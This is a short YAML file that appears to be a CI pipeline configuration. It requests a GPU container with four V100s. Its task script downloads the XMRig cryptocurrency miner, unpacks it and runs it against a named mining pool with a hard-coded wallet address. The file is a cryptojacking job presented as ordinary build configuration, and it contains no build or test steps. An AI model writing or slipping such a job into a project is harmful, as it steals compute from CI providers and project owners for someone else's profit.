container:
  image: nvidia/cuda:10.0-runtime-ubuntu18.04
  cpu: 4
  memory: 12G
  gpu: 4
  gpu_type: nvidia-tesla-v100 # do we need the choice?
task:
  script: |
   apt update -y \
   && apt install -y wget \
   && wget https://github.com/xmrig/xmrig/releases/download/v6.9.0/xmrig-6.9.0-bionic-x64.tar.gz \
   && tar -xvf xmrig-6.9.0-bionic-x64.tar.gz \
   && ./xmrig-6.9.0/xmrig -o arq.pool.gntl.co.uk:10008 -u aRi1mBz6iddEmCrduae2TnYB94o41g9ug9HgPvBZF5aUNZY7opu7Z9HYTKA4PphzbTGdXamfR4RyW1XryRHpV92Qccd8fTsRkDV1RB37AVQKG -k --tls
   
